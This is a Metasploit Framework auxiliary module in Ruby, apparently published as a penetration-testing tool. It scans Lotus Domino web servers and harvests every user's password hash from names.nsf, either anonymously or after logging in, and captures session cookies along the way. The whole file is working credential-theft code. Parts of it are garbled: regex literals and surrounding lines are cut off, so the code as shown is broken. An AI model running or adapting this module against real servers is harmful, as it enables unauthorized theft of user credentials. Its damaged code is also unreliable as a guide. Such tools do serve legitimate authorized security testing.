## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Lotus Domino Password Hash Collector', 'Version' => '$Revision$', 'Description' => 'Get users passwords hashes from names.nsf page', 'Author' => 'Tiago Ferreira ', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(80), OptString.new('NOTES_USER', [false, 'The username to authenticate as', '']), OptString.new('NOTES_PASS', [false, 'The password for the specified username' ]), OptString.new('URI', [false, 'Define the path to the names.nsf file', '/names.nsf']), ], self.class) end def run_host(ip) user = datastore['NOTES_USER'].to_s pass = datastore['NOTES_PASS'].to_s $uri = datastore['URI'].to_s if (user.length == 0 and pass.length == 0) print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes without credentials") begin res = send_request_raw({ 'method' => 'GET', 'uri' => "#{$uri}\/$defaultview?Readviewentries", }, 25) if (res and res.body.to_s =~ /\ 'POST', 'uri' => '/names.nsf?Login', 'data' => post_data, }, 20) if (res and res.code == 302 ) if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i) cookie = "DomAuthSessId=#{$1}" elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i) cookie = "LtpaToken=#{$1}" else print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response") return :abort end print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL authentication for '#{user}'") print_status("http://#{vhost}:#{rport} - Lotus Domino - Getting password hashes") get_views(cookie,$uri) elsif (res and res.body.to_s =~ /names.nsf\?Login/) print_error("http://#{vhost}:#{rport} - Lotus Domino - Authentication error: failed to login as '#{user}'") return :abort else print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response") return :abort end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end def get_views(cookie,uri) begin res = send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}\/$defaultview?Readviewentries", 'cookie' => cookie, }, 25) if (res and res.body) max = res.body.scan(/siblings=\"(.*)\"/)[0].join 1.upto(max.to_i) {|i| res = send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}\/$defaultview?Readviewentries&Start=#{i}", 'cookie' => cookie, }, 25) viewId = res.body.scan(/unid="([^\s]+)"/)[0].join dump_hashes(viewId,cookie,uri) } end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end def dump_hashes(view_id,cookie,uri) begin res = send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}\/$defaultview/#{view_id}?OpenDocument", 'cookie' => cookie, }, 25) if (res and res.body) short_name = res.body.scan(/ rhost, :port => rport, :name => "http" ) report_auth_info( :host => rhost, :port => rport, :sname => 'http', :user => short_name, :pass => pass_hash, :ptype => "domino_hash", :source_id => domino_svc.id, :source_type => "service", :proof => "WEBAPP=\"Lotus Domino\", USER_MAIL=#{user_mail}, HASH=#{pass_hash}, VHOST=#{vhost}", :active => true ) end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end end end